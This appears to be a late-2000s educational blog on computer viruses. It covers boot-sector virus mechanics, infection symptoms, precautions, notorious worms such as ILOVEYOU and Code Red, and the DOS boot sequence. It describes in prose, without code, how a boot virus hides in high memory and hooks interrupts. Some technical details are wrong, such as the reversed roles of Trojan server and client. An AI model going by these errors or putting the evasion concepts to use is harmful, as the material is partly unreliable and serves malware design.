h)Virus gets loaded in a memory where a bootstrap program gets loaded. The virus cannot load the file IO.SYS. So virus has to load Disk Bootstrap Program in to the memory. This Disk Bootstrap Program is loaded in the place where the virus is loaded. As a result the virus will be overwritten. Thus the virus in the memory is destroyed. But the virus maker is too tricky and he will not let it to do so. The virus is programmed to load a copy of itself in the high end of the memory before loading the Disk Bootstrap Program. The size of the memory will be available at the location 0x413 and 0x414. The virus after loading into the high end of the main memory, it reduces the size of the memory stored in the location 0x413 and 0x414 by its size. After this process the virus will load the Disk Bootstrap Program and the control is passed to it.
i)The remaining part of the booting will occur in the normal way. But the virus will be active in the memory. It can capture interrupts and perform malicious task. It captures the interrupt for writing into memory and copies itself into the memory whenever the interrupt for memory writing is called. This way by capturing interrupts and being active in the memory the virus is able to spread themselves and perform malicious tasks in the computer. Since these processes does not informs anything to the user, the user feels that everything is OK and the virus will remain undetected. If we try to boot a system with an infected disk, the virus will affect that system also.

General precautions

2009-01-11T01:49:00.000-08:00

It is very hard to keep your computer safe from the attack of the viruses. Today most of the viruses infects the computers through the pen drives and internet. The CDs are also a medium of infection. With the arrival of flash drives the usage of CDs has been reduced to great extend. So we have to take precautions to reduce the infection. Some steps of avoiding infections are listed below:

Do not connect the flash drives or other memories that you are not sure about the content.

Use autorun killer softwares to increase

Install a good anti-virus to defend your system from viruses. It is very important to update the anti-virus periodically. Only the updated anti-virus can detect the new viruses.

Enable firewall which will increase the computer's security.

Shut down the computer in its proper way otherwise, you are helping the virus (if any) for its action.

The booting increases the chance for spreading of the viruses. So if there is an infection, switch on the system when you are ready to kick off the virus from your system.

Do not share CDs or DVDs burnt using an infected system.

Try to avoid the usage of cracks and patches for the sharewares.

Avoid viewing the restricted sites.

Some sites ask you to download Activex to view the content. Download Activex only from the publisher site.

These are only precautions. It does not guaranties that your system will be completely free from viruses. Taking these precautions will only reduce the risk of virus infection for your computer.

Common Symptoms of Virus Infection

2009-01-10T22:43:00.001-08:00

It is not possible to protect our system completely from the attack of the viruses. It will enter in to the system by several means. Most of the viruses shows its presence to the user when it has gained almost all the control of the computer.

Since the most commonly used operating system is WINDOWS, the systems running on windows are more subjected to virus attacks. Some of the common symptoms of virus infection are given below:

Disabling of the windows applications like Task Manager, Registry Edit, Folder Options etc. Since these applications point out the user about their existence and can be removed by the user easily with the help of these application. some viruses try to disable these applications.
You may see .exe files having the icon of folder and having the name of the containing folder. The most commonly seen name is new folder. The user being unknown of this virus tries to open it and the virus starts its job. Its working can be stopped by going to the task manager->processes->(name of the virus)->end process. This will stops the virus temporarily, not permanently.
Computer stops or restart responding when try to use certain softwares. This is because the virus may delete some of the files required by the software for its working. This will lead the system to an unknown state or a crash.
When you open certains emails with strange attachments, suddenly dialog boxes appear and your system performance will degrade suddenly.
The presence of the files havind double extension like .gif.exe, .avi.vbs, etc
The uninstalling of the antivirus software or the disabling of the antivirus software.
Strange pop ups and notifications appear alerting you about the system security.
Your friends receving infected mail from you.
Unexpected sounds from the speakers while playing media player. Flickering of the visual display.
Certain applications dissappear from your computer without your knowledge.
Windows will start normally, but becomes not responding while operating.
Windows does not boot displaying messages about the missing files. The files may be deleted by the viruses.
Low memory message displays even though you have plenty of RAM remainig unused.
You system became running at very low speed consuming more memory and processor's processing power.
Disappearing of a partition.
Cannot install new programs correctly.
Windows restarts unexpectedly.

The above mentioned things need not be a symptiom of virus infection. Some other problems related to both software and hardware also shows some of the above symptoms. So judgement must be done carefully.

Top 10 Notorious Viruses

2009-01-09T22:29:00.000-08:00

When the internet and other services are becoming more and more sophisticated, some people misuse their knowledge for the creation of evil things like viruses. Some of them created viruses for their fame. Here are a list of 10 viruses that causes destruction world wide.

Melissa

Melissa was one of the first computer viruses to get the public's attention. It was invented in 1999 by David L. Smith. He named the virus 'Melissa' named after an exotic dancer from Florida. Melissa was a macro viruses which spread through e-mails. the Melissa computer virus tempts recipients into opening

David L. Smith who is the creator of the virus Melissa

A Sreen Shot of Melissa

According to FBI, Melissa awoke interest in the part of government. Since the traffic of e-mail increased and due to the spreading of this virus, some companies have stopped their e-mail programs till the virus was brought to control. The Smith was sentenced with 20 month jail and he was fined with $5,000. He was also forbidden from using the computer networks without the proper authorization. Later Melissa virus was brought to control.

2. ILOVEYOU

One year after the invention of Melissa a new virus originated in Philippines. It is the ILOVEYOU virus. It is a worm that infected several computers. The worms are capable of infecting several computers independent of the operating system in the computer. They have the capability of self replication. Like Melissa virus this worm also spread through e-mail. The message of the email is that it was a love letter from a admirer. The attachment of the e-mail is the virus file with the name LOVE-LETTER-FOR-YOU.TXT.vbs. The .vbs in name stands for the language used by hacker to create the virus (Visual Basic Scripting).

Screen shot of the ILOVEYOU virus

ILOVEYOU virus had a wide range of attacks: It replicates several times and hide the copies in several folders in the victims computer. It added new values to the victim's computers registry keys. It placed several files with its copy in the victim's computer. It send its copy to several other computers through chats and e-mails. It downloaded a file called WIN-BUGSFIX.EXE from the Internet and executed it. This program was a password-stealing application that e-mailed secret information to the hacker's e-mail address. Some think it was Onel de Guzman of the Philippines created the ILOVEYOU virus. Filipino authorities investigated de Guzman on charges of theft -- at the time the Philippines had no computer espionage or sabotage laws. Citing a lack of evidence, the Filipino authorities dropped the charges against de Guzman, who would neither confirm nor deny his responsibility for the virus. According to some estimates, the ILOVEYOU virus caused $10 billion in damage.

3.The Klez Virus

The Klez virus was discovered in the 2001. The variations of this virus plagued the Internet for several months. The basic Klez worm infected a victim's computer through an e-mail message, replicated itself and then sent itself to people in the victim's address book. Some variations of the Klez virus carried other harmful applications that could render a victim's computer inoperable. Depending on the version, the Klez virus could act like a normal computer virus, a worm or a Trojan horse. It could even disable virus-scanning software and pose as a virus-removal tool. Fortunately for consumers, there's no shortage of antivirus software suites on the market.

Scree shot of Klez Virus

Shortly after it appeared on the Internet, hackers modified this Klez virus in a way that made it far more effective. Like other viruses, it could peep into a victim's address book and send itself to contacts. But it could also take another name from the contact list and place that address in the "From" field in the e-mail client. It's called spoofing -- the e-mail appears to come from one source when it's really coming from somewhere else.

Spoofing an e-mail address accomplishes a couple of goals. For one thing, it doesn't do the recipient of the e-mail any good to block the person in the "From" field, since the e-mails are really coming from someone else. A Klez worm programmed to spam people with multiple e-mails could clog an inbox in short order, because the recipients can't judge what is the real source of the problem. Also, the e-mail's recipient might recognize the name in the "From" field and therefore be more chance for the recipient to open it.

4. Code Red and Code Red II

The Code Red and Code Red II worms popped up in 2001. Both worms exploited an operating system's vulnerability that was found in machines running Windows 2000 and Windows NT. The vulnerability was a buffer overflow problem, which means when a machine running on these operating systems receives more information than its buffers can handle, it starts to overwrite adjacent memory.

The original Code Red worm initiated a distributed denial of service (DDoS) attack on the White House. That means all the computers infected with Code Red tried to contact the Web servers at the White House at the same time causing the overloading of the machines.

The CERT Coordination Center at Carnegie-Mellon university published an advisory alerting the public to the dangers of the Code Red virus.

A Windows 2000 machine infected by the Code Red II worm no longer obeys the owner. That's because the worm creates a backdoor into the computer's operating system, allowing a remote user to access and control the machine. In computing terms, this is a system-level compromise, and it's bad news for the computer's owner. The person behind the virus can access information from the victim's computer or even use the infected computer to commit crimes. That means the victim not only has to deal with an infected computer, but also may fall under suspicion for crimes he or she didn't commit.

While Windows NT machines were more vulnerable to the Code Red worms, the viruses' effect on these machines wasn't as extreme. Web servers running Windows NT might crash more often than normal, but that was about as bad as it got. Compared to the woes experienced by Windows 2000 users, that's not so bad.

Microsoft released software patches that addressed the security vulnerability in Windows 2000 and Windows NT. Once patched, the original worms could no longer infect a Windows 2000 machine; however, the patch didn't remove viruses from infected computers -- victims had to do that themselves.

5. Nimda

Another virus to hit the Internet in 2001 was the Nimda (which is admin spelled backwards) worm. Nimda spread through the Internet rapidly, becoming the fastest propagating computer virus at that time. In fact, according to TruSecure CTO Peter Tippett, it only took 22 minutes from the moment Nimda hit the Internet to reach the top of the list of reported attacks.

The Nimda worm's primary targets were Internet servers. While it could infect a home PC, its real purpose was to bring Internet traffic to a crawl. It could travel through the Internet using multiple methods, including e-mail. This helped spread the virus across multiple servers in record time.

Removal of Nimda Virus

The Nimda worm created a backdoor into the victim's operating system. It allowed the person behind the attack to access the same level of functions as whatever account was logged into the machine currently. In other words, if a user with limited privileges activated the worm on a computer, the attacker would also have limited access to the computer's functions. On the other hand, if the victim was the administrator for the machine, the attacker would have full control.

The spread of the Nimda virus caused some network systems to crash as more of the system's resources became fodder for the worm. In effect, the Nimda worm became a distributed denial of service (DDoS) attack.

6. SQL Slammer/Sapphire

The Slammer virus hit South Korea hard, cutting it off from the Internet and leaving Internet cafes like this one relatively empty.

In late January 2003, a new Web server virus spread across the Internet. Many computer networks were unprepared for the attack, and as a result the virus brought down several important systems. The Bank of America's ATM service crashed, the city of Seattle suffered outages in 911 service and Continental Airlines had to cancel several flights due to electronic ticketing and check-in errors.

The culprit was the SQL Slammer virus, also known as Sapphire. By some estimates, the virus caused more than $1 billion in damages before patches and antivirus software caught up to the problem. The progress of Slammer's attack is well documented. Only a few minutes after infecting its first Internet server, the Slammer virus was doubling its number of victims every few seconds. Fifteen minutes after its first attack, the Slammer virus infected nearly half of the servers that act as the pillars of the Internet .

7. MyDoom

The MyDoom virus inspired politicians like U.S. Senator Chuck Schumer to propose a National Virus Response Center.

The MyDoom (or Novarg) virus is another worm that can create a backdoor in the victim computer's operating system. The original MyDoom virus have several variants had two triggers. One trigger caused the virus to begin a denial of service (DoS) attack starting Feb. 1, 2004. The second trigger commanded the virus to stop distributing itself on Feb. 12, 2004. Even after the virus stopped spreading, the backdoors created during the initial infections remained active.

Later that year, a second outbreak of the MyDoom virus gave several search engine companies grief. Like other viruses, MyDoom searched victim computers for e-mail addresses as part of its replication process. But it would also send a search request to a search engine and use e-mail addresses found in the search results. Eventually, search engines like Google began to receive millions of search requests from corrupted computers. These attacks slowed down search engine services and even caused some to crash.

MyDoom spread through e-mail and peer-to-peer (P-P) networks. According to the security firm MessageLabs, one in every 12 e-mail messages carried the virus at one time. MyDoom could spoof e-mails so that it became very difficult to track the source of the infection.

8. Sasser and Netsky

Sometimes computer virus programmers escape detection. But once in a while, authorities find a way to track a virus back to its origin. Such was the case with the Sasser and Netsky viruses. A 17-year-old German named Sven Jaschan created the two programs and unleashed them onto the Internet. While the two worms behaved in different ways, similarities in the code led security experts to believe they both were the work of the same person.

The Sasser worm attacked computers through a Microsoft Windows vulnerability. Unlike other worms, it didn't spread through e-mail. Instead, once the virus infected a computer, it looked for other vulnerable systems. It contacted those systems and instructed them to download the virus. The virus would scan random IP addresses to find potential victims. The virus also altered the victim's operating system in a way that made it difficult to shut down the computer without cutting off power to the system.

The Netsky virus moves through e-mails and Windows networks. It spoofs e-mail addresses and propagates through a 22,016-byte file attachment. As it spreads, it can cause a denial of service (DoS) attack as systems collapse while trying to handle all the Internet traffic. At one time, security experts at Sophos believed Netsky and its variants accounted for 25 percent of all computer viruses on the Internet.

Image of Sven Jaschan

Sven Jaschan spent no time in jail; he received a sentence of one year and nine months of probation. Because he was under 18 at the time of his arrest, he avoided being tried as an adult in German courts.

9. Leap-A/Oompa-A

This virus attacks Macs than ordinary PCs. Mac computers are partially protected from virus attacks because of a concept called security through obscurity. Apple has a reputation for keeping its operating system (OS) and hardware a closed system -- Apple produces both the hardware and the software. This keeps the OS obscure. Traditionally, Macs have been a distant second to PCs in the home computer market. A hacker who creates a virus for the Mac won't hit as many victims as he or she would with a virus for PCs.

In 2006, the Leap-A virus, also known as Oompa-A, debuted. It uses the iChat instant messaging program to propagate across vulnerable Mac computers. After the virus infects a Mac, it searches through the iChat contacts and sends a message to each person on the list. The message contains a corrupted file that appears to be an innocent JPEG image.

A Screen Shot of Leap-A virus

The Leap-A virus doesn't cause much harm to computers, but it does show that even a Mac computer can fall prey to malicious software. As Mac computers become more popular, we'll probably see more hackers create customized viruses that could damage files on the computer or snarl network traffic.

10. Storm Worm

The latest virus on our list is the dreaded Storm Worm. It was late 2006 the computer security experts first identified the worm. The public began to call the virus the Storm Worm because one of the e-mail messages carrying the virus had as its subject "230 dead as storm batters Europe." Antivirus companies call the worm other names. For example, Symantec calls it Peacomm while McAfee refers to it as Nuwar. This might sound confusing, but there's already a 2001 virus called the W32. Storm.Worm. The 2001 virus and the 2006 worm are completely different programs.

A Screen shot of Storm Worm

The Storm Worm is a Trojan horse program. Its payload is another program, though not always the same one. Some versions of the Storm Worm turn computers into zombies or bots. As computers become infected, they become vulnerable to remote control by the person behind the attack. Some hackers use the Storm Worm to create a botnet and use it to send spam mail across the Internet.

Many versions of the Storm Worm fool the victim into downloading the application through fake links to news stories or videos. The people behind the attacks will often change the subject of the e-mail to reflect current events. For example, just before the 2008 Olympics in Beijing, a new version of the worm appeared in e-mails with subjects like "a new deadly catastrophe in China" or "China's most deadly earthquake." The e-mail claimed to link to video and news stories related to the subject, but in reality clicking on the link activated a download of the worm to the victim's computer.

Several news agencies and blogs named the Storm Worm one of the worst virus attacks in years. By July 2007, an official with the security company Postini claimed that the firm detected more than 200 million e-mails carrying links to the Storm Worm during an attack that spanned several days. Fortunately, not every e-mail led to someone downloading the worm.

Although the Storm Worm is widespread, it's not the most difficult virus to detect or remove from a computer system. If you keep your antivirus software up to date and remember to use caution when you receive e-mails from unfamiliar people or see strange links, you'll save yourself some major headaches.

Other Malicious Softwares

2009-01-05T20:37:00.000-08:00

In the olden days of computing the only thing the viruses spread through is the infected floppies. The booting from infected floppies causes the viruses to spread in to the host machine. With the advancement of the technology the medium of spreading also widened. The medium of spreading became internet, pen drives etc. The internet service has resulted in the formation of several malicious softwares. There are several such softwares available in the internet.

Trojans

The most important difference between the Trojans and viruses is that Trojans cannot spread themselves whereas the viruses spread themselves. The Trojans disguise themselves as useful softwares and the user will download and install it thinking that it is a useful software. He only recognizes the harmful effect of Trojans only after it has started its job.

The Trojan has two parts: a server and a client. The server is the part that is installed in the attacker's system. It is the client that disguised themselves as a useful software and get installed in the victims machine. The client is present in the peer to peer networks and unofficial download sites. Once the Trojans enter in to the victims site, it has vast capability of destruction. The Trojans are highly sophisticated that they can be used according to the wish of the attacker. The attacker can decide the degree of harmness that can be caused by the Trojans. There are different types of Trojans. Some of them are listed below. A Trojan could have any or one of the combination of the below mentioned functionalities.

Remote Access Trojans

These Trojans give full control of the victim's machine to the attacker. The attacker can gather several information from the victim's machine including confidential thins like passwords, credit card number etc stored in the victim's machine.

Password Sending Trojans

These type of Trojans possesses great threats even today. The purpose of these Trojans is to send the password stored in the cached memory. They can also steal the passwords as you enter the passwords. They then send it to the specified e-mail without the users knowledge. Passwords of the restricted sites, e-mail, messaging services and FTP services come under the threat of these Trojans.

Keyloggers

These Trojans log victim's keystroke end send the log files to the attacker. They can be active in two modes: one in online mode and the other in the offline mode. The attacker can get several information including the passwords. The logs are send in the daily basis.

Destructive

The only function of these Trojans is to destroy all files in the core system. They performs the destructive work according to the will of the programmer or can be programmed to work as a logic bomb which can be activated in a special date or time.

Denial of Service (DoS) Attack Trojans

The main aim of this kind of Trojans is to reduce the bandwidth of the victims machine by increasing the net traffic. This makes the internet connection too overloaded to let the user to visit a website or download anything. One of the variation of this type of Trojans is the mail-bomb Trojan, whose main aim aim is to infect maximum systems as possible and simultaneously attack a specific e-mail address with random subjects and content that cannot be filtered. However today the e-mail service providers use advanced filters to filter out these malicious softwares upto an extend.

Proxy/Wingate Trojans

These Trojans turn the victim's system into a Proxy/Wingate server. Thus the victim's machine will be opened to many other systems connected to the network. The attacker can easily use this victim's system to anonymously browse in to the restricted sites and access various risky internet services. The attacker can register domains or access pornographic sites with stolen credit card number or can perform several similar illegal activities.

FTP Trojans

These Trojans are commonly very simple. But most of them does not exist today. It does nothing but opens the port for the FTP transfer that is port 21. So everyone connected to the network can access files from the victim's machine. Today the systems are password protected so that only attacker can connect to the computer.

Software Detection Killers

The main aim of these Trojans is to kill the softwares or firewalls that protect your computer from malicious softwares. This will reduces your computer's defense to the malicious softwares and becomes easily vulnerable to attacks. These Trojans exists even today. Some anti-virus asks the displays a confirmation message when they are to be uninstalled.

Worms

Computer worms are programs that reproduce themselves and run independently. They can travel across the network connections They are platform independent, so they can attack system running on any operating system. The difference between a worm and a virus is the method in which they reproduce and spread. A virus is dependent on a host file or a boot sector, and transfer of files between the machines to spread, while a worm can run completely independent and spread of its own through the network connections.

The security threat of worm is same as that of the viruses. Worms are capable of doing wide range of damages such as destroying essential files in the victim's computer, slowing it down to the maximum extend and even causes some of the essential programs to crash. Two famous worms are MS-Blaster and Sasser worms.

Spyware

Spyware is also an Adware (advertising-supported software). Advertising in shareware products is a way for shareware authors to make money, other than by selling it to the user. There are several large companies that offer to place banner ads in their products in exchange for a portion of the revenue from banner sales. If the user finds the banner annoying, there is usually an opinion to get rid of it by paying the license fee.

Unfortunately, the advertising companies often also install additional tracking software in your system that is continuously using your internet connection to send the statistical data back to the advertisers. Although the companies claims that they did not collect any personal information from the user so that he will be anonymous, the fact is that there is a server running in your computer that will send the information about you and your surfing habits to a remote location using the bandwidth of your internet connection.

Spyware slows down the speed of your internet connection. They also reduces the processing power of your computer. Sometimes unwanted pop ups will irritate the user. It also changes the settings of your browser like changing the home page or default search engines. Many people does not consider it as illegal. But unfortunately there is no way to get rid of such nuisance.

Types of viruses

2009-01-04T03:51:00.000-08:00

There are thousands of viruses today. More and more viruses are discovered nowadays. So its becoming difficult to detect and destroy new viruses. The new viruses are programmed in such a way that they can enter in to the computer memory without detecting by the anti viruses. So the anti virus companies are stepping up the security levels. There are different types of viruses nowadays. Some of them are given below.

File viruses (Parasitic Viruses)

File viruses or parasitic viruses are a piece of code or application that is attached themselves to the other files that are executable or driver files or compressed files. They get activated when the host program is executed. After activation these viruses start spreading by latching themselves to many other files and thus they spread like a forest fire. Then they start destruction to the data or loss of files or corruption of files. Most of the viruses of this type when activated enters in to the computer memory and searches for the other files which can be infected by them. It can even spread and infect the other systems that are shared with it.

Besides spreading themselves these viruses perform destructive activities also. The destructive activity can be activated by means of a 'trigger'. The trigger may be the execution of the host file or the virus file by itself, otherwise the trigger may be some date or time. The date and time can be obtained from the system date and time. The trigger may be the number of times the virus has replicated or something similar to it. The examples of file viruses are: Randex, Meve, MrKlunky, Casino, Boza, Tentacle, Win32/CIH.

Boot Sector Viruses

They are also known as System Sector Viruses. Boot Sector Viruses infects the boot sector which is a crucial part of a computer system. The boot sector is where all information about the drive is stored, along with a program that helps the virus in loading into memory at the time of every booting. The Boot Strap Virus does not affects the files. First it moves or overwrites the original boot code, replacing it with infected boot codes. Then the virus will move the original boot sector information to another sector on the disk, marking that sector as a bad spot on the disk so it will not be used in the future. To be infected by this type of virus, you must boot the computer using an infected floppy disk. For example, if a user leaves an infected floppy disk in the disk drive and you reboot the computer, then you will bring the virus into the system. The inability to attack the files leads to their downfall. In the era when floppies where used these viruses spread like a wild fire. But the introduction of CDs reduced their spreading. However some of them still exists. The operating systems of today prevent them from activating. Examples of Boot Sector Viruses: Joshi, Devil's Dance, V-Sign, Polyboot.B, AntiEXE.

Multi-Polymorphic Viruses

This type of virus affects both boot sectors and executable files. They can combine some of the characteristics of stealth and polymorphic viruses. These viruses spread through infected media and reside in the memory. They then move to the boot sector of the memory. From there it infect the executable files in the system and it spread across the system. Today also there are many multi-polymorphic viruses in existance. Example of muli-polimorphic virus is Ywinz.

Macro Viruses

These kinds of viruses use an application's own macro programming language to distribute themselves. Macro viruses can infect Word files, as well as any other application that uses a programming language. These viruses infect documents, templates but not programs. When you open a document or a template that contains a macro virus, then the virus will spread to other documents and templates you may have on your system. For example, a macro virus can change, delete document contents, change settings in the Word environment, set a password, copy a DOS virus to the user's system and much more… Moreover, macro viruses have the potentiality of spreading across different platforms such as PC to Mac. Because they are programmed to work with the application than with the operating system. This makes them platform independent. If you are familiar with the Word macros you have on your system, you can look through the various macros for ones that you do not recognize. The first macro virus was written for Microsoft Word and was discovered back in August 1995. Today there are thousands of macro viruses exists. Examples of types of macro viruses: AAAZAO, AAAZFS, AutoOpen, FileSaveAs, PayLoad, Relax, Melissa.A, Bablas etc.

For more information about Macro Viruses see http://www.bu.edu/computing/virus/macro-protection.html

Network Viruses

These viruses are capable of fast spreading through networks including LAN and internet. It is commonly transfered through shared drives and folders. Once it affects a system it searches for other vulerable systems and infects it. Examples of the Network viruses are: Nimda, SQLSlammer.

E-mail Viruses

These viruses are a form of macro virus that spreads itself to all the contacts in the address book. If any of the e-mail recipients opens the attachment of the infected mail, it spreads to the address book of the recipient and thus they spreads like a wild fire. Nowadays viruses are capable of infecting the system even if the infected mail is previewed in a window. Example of the e-mail viruses: ILOVEYOU virus

Booting

2008-12-26T08:45:00.000-08:00

The booting procedure is described below.

We all know booting is the process of loading of programs from the secondary storage devices like hard disks to the primary memory RAM. This does not occur in one step. It occurs through a series of steps. They are listed below:

1. The first step in the process of booting is Power On Self Test (POST). During this stage the programs stored in the ROM of the computer checks whether the other programs were in the right order.
2. The next stage is to set up the Interrupt Vector Table (IVT). This table contains interrupt number and the address of the corresponding interrupt service routine. When an interrupt is occurred the processor looks in to the IVT and gets the location of the interrupt service routine and executes the task specified by that interrupt service routine.
3. In the third stage the system performs the RAM test. During RAM test the system calculates the maximum size of the RAM and stores it in the location 0x413 and 0x414. Thus we will get the maximum size of the RAM from the location 0x413 and 0x414.
4. The next step is to initialize the standard equipments like keyboard, disc drives etc. The list of these equipments are stored in the memory location 0x410
5. The next step is to initialize the non-standard equipments like hard disk drive. The computer checks for the non-standard equipments connected to the computer. If they were found they momentarily transfer control to ROM extension routines. After initializing the non-standard equipments the computer transforms the control back to the ROM startup routines.
6. The system contains the RAM startup routine. The RAM startup routine reads the boot sequence from CMOS RAM. This is applicable only for the processors AT and above. For XT processors the boot sequence will always starts from A drive. This cannot be changed. But in the case of AT processors the boot sequence can be changed according to the need of the user.
7. The system contains Bootstrap Loader whose purpose is to load the content of the side 0, track 0 and sector 1.

From here we have to deal with two cases regarding the type of the processor.
In the case of the XT processors booting starts loading the programs from the floppy drive then t the hard disk (from A drive then to C drive ). But in the case of the AT processor the boot sequence can be changed. Let us first look in to the case of the XT processor:

BOOTING FROM FLOPPY DISK

(i) The Bootstrap Loader is a short and primitive program, smart enough to move the head of the disk drive to track 0, and read the contents of the first physical sector of the disk into memory, at a predetermined location and pass control to it.

The side 0, track 0, sector 1 of floppy disk contains Boot Parameters and Disk Bootstrap Program. Hence the Bootstrap Loader loads into memory and hands over the control to them.

The first three bytes of the boot parameters contains the jump instruction. This instructions cause the control to jump to the Disk Bootstrap Program, bypassing the Boot Parameters which are placed after the jump instruction.

The important job of the Disk Bootstrap Program is to load the file IO.SYS into the memory. But there is a problem in doing this. The Disk Bootstrap Program does not know the exact location of the file IO.SYS on the disk which depends upon the number of copies of the FAT on the disk, number of sectors occupied by each copy of FAT and a number of sectors occupied by the directory.
These parameters vary from disk to disk.This is where the Boot Parameters come into rescue of Disk Bootstrap Program. Using the data in the Boot Parameters it calculates the exact location of the file IO.SYS. Once this location has been found out, the actual loading of Operating System into memory starts.

(2) The Disk Bootstrap Program first checks for the existance of the file IO.SYS. If the file is present the file is loaded into memory and passes control to it. If the fle is abscent then the familiar message is displayed:

Non system disk. Insrt system disk and press any key.

On inserting a disk containing the file and the pressing a key, it loads the IO.SYS from the disk. As soon as IO.SYS is loaded, the Disk Bootstrap Program is removed from the memory.

(3) IO.SYS consists of two modules: - Disk BIOS and SYSINIT. Let us discard the case of Disk BIOS for the time being. Lets go with SYSINIT. SYSINIT module loads the file MSDOS.SYS from disk into memory and passes control to it.

(4) MSDOS.SYS builds some internal data structures and work ares and then returns the control to SYSINIT.
SYSINIT loads a file CONFIG.SYS file from the root directory of the floppy. The optional file can contain a variety of commands that enables the user to customize the working environment. For example, the user may specify the nmber of disk buffers, the maximum number of files that can be opened, etc. If it is found, the entire CONFIG.SYS file is loaded into memory and each command in it is executed one line at a time.

(5) SYSINIT then loads the Resident portion of the file COMMAND.COM into memory. Once the Resident portion is loaded, the SYSINIT module is discarded from the memory and the control is handed over to the Resdent portion.

(6) The Resident Portion of COMMAND.COM loads the Trancient Portion of COMMAND.COM into high end of memory. Here high end means the top of base memory. This high end may vary from computer to computer since different computers have different base memory sizes. The resident portion finds out the high end from the base memory size stored at locations 0x413 - 0x414 during the RAM test. The Transcient Portion of the COMMAND.COM executes the file AUTOEXEC.BAT, if it is present in the root directory.

(7) The Transcient Portion of COMMAND.COM finally displays the DOS prompt.

BOOTING FROM HARD DISK

In the case of Booting from hard disk also the steps from 1 - 7 remains the same. Continuing steps are given below:
(1) Since the capacity of the hard disk is huge we can use different Operating Systems. For this purpose we divide the whole portion into different logical partitions and install one or more Operating Systems in each partition. The information about where each partition begins and ends, the size of each partition, etc are stored in a partition table in side 0, track 0, sector 1. This sector also contains a Master Boot Program. The partition table is 64 bytes long. The partition table also indicates which is the bootable partition. The ROM Bootstrap Loading Program loads the partition table and the Master Boot program into memory and passes control to it.

(2) The Master boot program finds out which is the bootable partition, loads the boot sector (containing Boot Parameters and Disk Bootstrap Program) from the bootable partition and passes control to it.

(3) Once the Disk Bootstrap Program receives the control the rest of the booting procedure is same as in the case of booting from a floppy disk.

Introduction

2008-12-18T07:41:00.000-08:00

You may have computers. While working with computers you may note several bad things happening in your computer. You may found that your .exe files are losing, word document is displaying unnecessary messages, your internet bandwidth becoming narrower, alert symbol in the system tray etc. When you ask your colleagues about this problem they have only one answer-“VIRUS”.

Now let us browse in to the world of virus…….

What is a virus?

A virus is an executable file that is capable of replicating (copying itself). The viruses are programmed for destructive purposes like deleting files and data, reducing the bandwidth of the network medium etc. The size of most of the virus is in KB. This shows that the most of the virus were made by the brilliant programmers. Viruses are of different types and forms. They can latch to other files like .exe, .com etc. They have the capability to spread through the removable media like floppy disk, CDs, flash drives etc. Some have the capability to spread through the network. Most of the viruses are programmed in assembly language that results in its reduced size.